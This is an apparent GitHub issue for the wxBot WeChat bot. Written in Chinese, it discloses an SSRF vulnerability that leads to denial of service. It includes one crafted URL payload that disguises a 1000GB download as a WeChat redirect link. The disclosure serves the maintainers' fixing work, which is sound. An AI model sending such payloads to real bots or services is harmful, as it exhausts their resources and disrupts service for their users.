wxBot icon indicating copy to clipboard operation
wxBot copied to clipboard

Published 20 hours ago verified publisher icon liuwons

SSRF DDoS 漏洞

Open rixtox opened this issue 7 years ago • 0 comments

當bot接收到以下文字消息會觸發 SSRF,由於現在沒有異步,如果請求文件很大會拒絕服務造成 DDoS。

http://speedtest.tele2.net/1000GB.zip#http://weixin.qq.com/cgi-bin/redirectforward?args=

rixtox avatar Mar 31 '17 17:03 rixtox